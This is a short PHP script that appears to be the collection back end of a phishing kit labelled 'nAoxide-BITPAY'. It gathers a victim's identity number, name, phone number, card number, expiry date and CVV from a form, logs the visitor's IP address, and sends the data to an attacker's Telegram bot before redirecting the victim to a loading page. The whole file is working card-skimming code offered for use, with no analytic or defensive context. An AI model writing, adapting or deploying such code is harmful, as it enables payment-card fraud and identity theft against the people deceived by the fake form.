<?php

session_start();
include 'config.php';

$date = date('m/d/Y h:i:s a', time());
$ip = getenv("REMOTE_ADDR");
if($_POST['identity'] != "" AND $_POST['phone'] != "" AND $_POST['cc'] != "" AND $_POST['month'] != "" AND $_POST['year'] != "" AND $_POST['csc'] != "" AND $_POST['name'] != "")
{	
$message .= "🔪🔪💣💣nAoxide-BITPAY💣💣🔪🔪\n";
$message .= " 🌏  IP   : $ip\n";
$message .= " 🆔 ID : ".$_POST['identity']."\n";
$message .= " 🧑 Name : ".$_POST['name']."\n";
$message .= " 📞 Phone Number : ".$_POST['phone']."\n";
$message .= " 💳 Card : ".$_POST['cc']."\n";
$message .= " 📆 Expiry : ".$_POST['month']."/".$_POST['year']."\n";
$message .= " 🔑 CVV : ".$_POST['csc']."\n";
$message .= "🔪🔪💣💣##############💣💣🔪🔪";

$_SESSION['ip']=$ip;
$_SESSION['identity']=$_POST['identity'];
$_SESSION['name']=$_POST['name'];
$_SESSION['phone']=$_POST['phone'];
$_SESSION['cc']=$_POST['cc'];
$_SESSION['month']=$_POST['month'];
$_SESSION['year']=$_POST['year'];
$_SESSION['csc']=$_POST['csc'];

//======= bot telgram message ======== //
file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chatID."&text=" . urlencode($message)."" );
header("Location: loading.html");
} else{
header("Location: index.html");}

?>